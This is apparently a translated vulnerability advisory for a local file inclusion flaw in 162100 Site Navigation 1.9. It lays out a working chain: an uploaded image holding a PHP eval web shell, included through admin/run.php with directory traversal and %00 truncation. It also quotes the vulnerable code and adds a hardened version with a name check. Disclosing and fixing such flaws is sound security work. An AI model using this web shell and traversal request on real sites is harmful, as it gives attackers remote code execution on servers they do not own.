162100 Site Navigation 1.9 local file inclusion vulnerability - vulnerability warning - the black bar safety net

2010-10-28T00:00:00
ID MYHACK58:62201028209
Type myhack58
Reporter Anonymous
Modified 2010-10-28T00:00:00

Description

A trivial program with a trivial vulnerability, but I am posting it anyway to encourage everyone to learn. No malicious destruction!

Official program site: http://download.162100.com

Part of the code of run.php in the admin directory is shown in the listing below. I found the upload directory:

editor/index.html

Use the image upload function to upload a 1.jpg whose content is <?php eval($_POST[cmd])?>

This gives the address editor/images/upload/2010102718265325.jpg

Then request admin/run.php?run=../../editor/images/upload/2010102718265325.jpg%00

That gives a one-liner backdoor. The rest you know....

```php
<?php
// The only check is that the file exists; if it does, it is included without any
// other restriction, so directory traversal is possible. As long as a file can be
// uploaded, %00 truncation lets that upload be included.
if ($_REQUEST['run'] && file_exists('./run/'.$_REQUEST['run'].'.php'))
    require_once('./run/'.$_REQUEST['run'].'.php');
else
    alert('command error or a function has not been opened!', './index.html');
?>
```
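A hardened form of the run.php include above, as an added example that is not the 162100 project's code: the `run` value must be a plain module name, and the resolved file must sit directly inside the module directory. The helper name `resolve_run_module`, the `backup` module and the temporary directory layout are assumptions made for the demo.

```php
<?php
// Added example, not the project's code. Assumption: modules are stored as ./run/<name>.php.

// Hypothetical helper: returns the absolute path to include, or null if the request is rejected.
function resolve_run_module(string $baseDir, $run): ?string
{
    // Reject non-strings (run[]=x), NUL bytes, slashes, dots: only a plain module name passes.
    if (!is_string($run) || !preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $run)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $run . '.php');
    // Defence in depth: after symlink resolution the file must still sit directly in $base.
    if ($base === false || $path === false || dirname($path) !== $base || !is_file($path)) {
        return null;
    }
    return $path;
}

// Constructed demo layout: one legitimate module, one .php file in the upload directory.
$root = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
@mkdir("$root/admin/run", 0700, true);
@mkdir("$root/editor/images/upload", 0700, true);
file_put_contents("$root/admin/run/backup.php", "<?php // legitimate module\n");
file_put_contents("$root/editor/images/upload/sample.php", "<?php // stands in for an upload\n");

// Constructed inputs; the second mirrors the traversal + %00 request in the advisory.
$cases = [
    'backup',
    "../../editor/images/upload/sample.jpg\0",
    '../../editor/images/upload/sample',   // exists as .php, passes the original file_exists()
    'missing',
    ['backup'],
];
foreach ($cases as $run) {
    $resolved = resolve_run_module("$root/admin/run", $run);
    printf("%-50s => %s\n",
        json_encode($run, JSON_UNESCAPED_SLASHES),
        $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}

// Remove the demo files again.
unlink("$root/admin/run/backup.php");
unlink("$root/editor/images/upload/sample.php");
```

PHP 5.3.4 and later reject NUL bytes in filesystem paths, which removes the %00 truncation, but the traversal through `run` still needs the name check shown here.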

I'll upload a phpinfo below as an illustration. It is a poor program, but you will inevitably run into it during penetration tests. I hope you will also share the program vulnerabilities you happen to dig up in your day-to-day site testing, so that we can learn together and save more time.

This program also has cookie spoofing and other vulnerabilities, but they are of little significance. This one is enough.

Starter tools Lu Yu